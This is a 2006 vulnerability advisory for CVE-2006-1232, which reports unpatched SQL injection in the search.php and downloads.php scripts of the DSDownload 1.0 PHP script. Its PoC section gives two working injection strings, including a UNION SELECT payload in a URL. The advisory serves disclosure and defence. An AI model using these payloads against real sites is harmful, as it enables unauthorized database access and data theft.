Multiple SQL Injection in DSDownload

Summary

Vulnerability
Multiple SQL Injection in DSDownload
Discovered
2006.03.12
Last Update
2006.03.23 Exploitation code published
ID
EV0099
CVE
CVE-2006-1232
Risk Level
medium
Type
SQL Injection
Status
Unpatched. No reply from developer(s)
Vendor
n/a
Vulnerable Software
DSDownload (http://dsportal.uw.hu/)
Version
1.0
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

SQL Injection found in DSDownload (http://dsportal.uw.hu/) script.

Vulnerable scripts:
search.php
downloads.php


Variables $key $category are not properly sanitized before being used in SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off

PoC/Exploit

SQL Injection Examples:

1) Example1

URL: http://[host]/dsdownload/index.php
Search: asd%'or(1)/*


2) Example2

http://[host]/dsdownload/downloads.php?category=999'%20union%20select%206,2,3,4,5,1,7,8/*

Solution.

Solution for "Multiple SQL Injection in DSDownload" is not available. Check vendor's website for updates.